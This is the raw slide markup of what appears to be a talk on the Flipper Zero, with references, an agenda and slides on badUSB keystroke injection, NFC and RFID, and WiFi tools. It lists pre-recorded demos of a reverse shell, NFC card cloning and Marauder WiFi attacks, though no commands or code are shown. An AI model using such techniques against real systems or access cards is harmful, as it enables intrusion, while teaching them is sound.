              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="Google Shape;252;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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58" name="Google Shape;25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Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://flipperzero.one/</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.androidauthority.com/what-is-nfc-270730/</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=m0wXeSxQj9I</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://link.springer.com/content/pdf/10.1007/978-3-540-85893-5_20.pdf</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://securelist.com/darkvishnya/89169/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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Agenda - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Features</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="3718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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>About the Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>badUSB</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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Overview</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Use Cases</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF8A0D"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Reverse Shell Demo*</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Radio Frequency</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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Overview</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Access Control With NFC</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF8A0D"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Clone NFC Tag/Card Demo*</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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Installing WiFi Features</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Marauder</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF8A0D"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Marauder Demo*</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Other Flipper Features</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Google Shape;72;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Google Shape;73;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16324" l="20384" r="26503" t="25888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065463" y="2121687"/>
            <a:ext cx="2658199" cy="1510875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6330825" y="4700975"/>
            <a:ext cx="271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Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>*Demos are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>pre recorded</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>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About the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253325" y="1135800"/>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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Open-source “multi-tool” for various radio protocols</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(NFC)  Near Field Communication</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(RFID) Radio Frequency </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>And more…</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>iButton</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Infrared</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(GPIO) General-Purpose Input/Output for Extensibility</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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3859850" y="2382725"/>
            <a:ext cx="5284152" cy="2760774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3363450" y="1646225"/>
            <a:ext cx="2417100" cy="73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891"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>badUSB</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Google Shape;88;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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badUSB - Overview</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Acts as a Human Interface Device, such as a keyboard</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Types thousands of words per minute</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Automate IT tasks</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3392">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
